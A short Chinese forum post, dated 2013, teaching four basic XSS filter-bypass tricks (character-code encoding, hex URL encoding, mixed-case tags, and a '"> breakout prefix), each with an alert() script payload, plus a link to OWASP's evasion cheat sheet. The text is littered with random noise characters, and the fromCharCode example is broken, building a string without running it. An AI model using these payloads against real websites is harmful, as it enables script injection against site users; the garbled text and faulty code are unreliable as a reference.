四种超级基础的绕过方法。8 a# F" l9 e+ o7 ?
1.转换为ASCII码
g6 @7 e2 h& N; m: ?2 n例子:原脚本为<script>alert(‘I love F4ck’)</script >3 h' q x: m8 H- M3 V/ q
通过转换,变成:5 s: G0 \$ U% T0 S
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
/ }1 h2 t7 D$ Z, o6 a; d8 t & B# W# v' I! X0 b" \# O3 `
2.转换为HEX(十六进制)) w2 n1 I* J& O! l! G
例子:原脚本为<script>alert(‘I love F4ck’)</script>& I8 i n, O1 _
通过转换,变成:" `; i3 Z" q: {+ w; j# p
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e- t+ v% }& G/ z4 k' W% W
' Z+ Y7 I7 j, G8 E$ n9 Z/ d
3.转换脚本的大小写
: a* ?3 D. U* T例子:原脚本为<script>alert(‘I love F4ck’)</script>
3 S4 y7 x# B2 W; E* f+ R# X转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
8 D8 j, O6 u1 i$ E
/ V' [& x @5 H/ x( N4.增加闭合标记”>
( O* g& ^2 S$ x6 {8 a3 ?0 \例子:原脚本为<script>alert(‘I love F4ck’)</script>, @3 O! ]% J3 Z6 B$ Y) \! R) ~8 Q
转换为:”><script>alert(‘I love F4ck’)</script>
1 r; w7 T7 V' X) @0 s# _, A更详细绕过技术请参考此网页
0 n: ^4 h2 b' @9 Q4 A9 m" ]https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
+ @6 \) x" M; Y9 }+ N# [* b
) P$ Y2 L1 [1 D4 x5 }转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对